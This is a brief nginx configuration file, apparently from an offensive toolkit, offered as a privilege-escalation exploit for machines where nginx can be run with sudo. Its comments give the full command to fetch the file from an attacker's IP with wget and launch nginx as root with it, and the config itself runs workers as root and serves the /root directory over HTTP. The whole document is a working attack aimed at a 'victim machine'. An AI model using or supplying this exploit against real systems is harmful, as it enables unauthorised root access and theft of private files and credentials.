#IF SUDO on nginx is enabled, then use this to privesc.
#Run Command in ur /home/ directory of VICTIM MACHINE
#Command to run; rm prives_nginx_sudo.conf ; wget <YOUR_IP>/prives_nginx_sudo.conf && sudo /usr/sbin/nginx -c /home/<USER>/prives_nginx_sudo.conf

user root;

worker_processes 1;

events {
    worker_connections 1024;
}

http {
    server {
        listen <PORT>; 

        root /root;

        location /oofy/ {
            alias /root;
        }
    }
}